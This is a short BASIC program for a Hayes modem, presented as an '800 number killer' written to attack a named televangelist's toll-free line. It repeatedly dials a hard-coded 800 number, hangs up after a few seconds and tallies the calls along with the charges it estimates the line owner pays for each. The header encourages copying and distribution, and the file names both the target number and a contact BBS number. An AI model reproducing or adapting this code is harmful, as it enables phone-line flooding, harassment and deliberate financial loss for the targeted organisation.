10 ' The 800 number killer for the Hayes modem. Originally writen 20 ' by Aiken Drum to kill Jerry Fallwell's 800 number. Version 1 30 ' Copy, Distribute, Change, Add your name. In general, have fun 40 ' 50 ' 100 KEY OFF:COLOR 2,0 110 ON ERROR GOTO 310 120 PPC=1.5 ' <<< Aprox. Price Per Call >>><<< (415) is about $1.50 >>> 130 OPEN "COM1:1200,E,7,1" AS #1 'Change to 300,e,7,1 for 300 baud 140 GOSUB 220 ' Ste up the modem 150 GOSUB 190 ' Dial the number and wait 160 CLS 170 NC=NC+1:PRINT "Calls: "NC" Price: ";:PRINT USING "$$########,.##";NC*PPC 180 GOTO 150 ' Repeat 181 ' 182 ' 190 PRINT #1,"ATDT 8004465000":GOSUB 260 ' The numer to kill 200 GOSUB 300 210 RETURN 211 ' 212 ' 220 GOSUB 260 230 PRINT #1,"ATZ":GOSUB 260 240 PRINT #1,"ATS7=13":GOSUB 260 ' The number after the = is how many seconds after dialing to hang up 250 RETURN 251 ' 252 ' 260 FOR T=1 TO 500:NEXT ' Get all modem input, 270 WHILE LOC(1):A$=INPUT$(1,1):PRINT A$;:WEND ' print it, and then 280 FOR T=1 TO 500:NEXT ' forget about it. Delays 290 RETURN ' to be sure we've got it all. 300 WHILE LOC(1)=0:WEND:GOSUB 260:RETURN ' wait for the NO CARRIER mess. 301 ' 302 ' 310 IF ERR=57 THEN RESUME ' Damn, an error. Leave 320 PRINT"ERROR "ERR" IN "ERL ' mail for Aiken Drum on the Matrix 330 STOP ' (415) 922 - 1370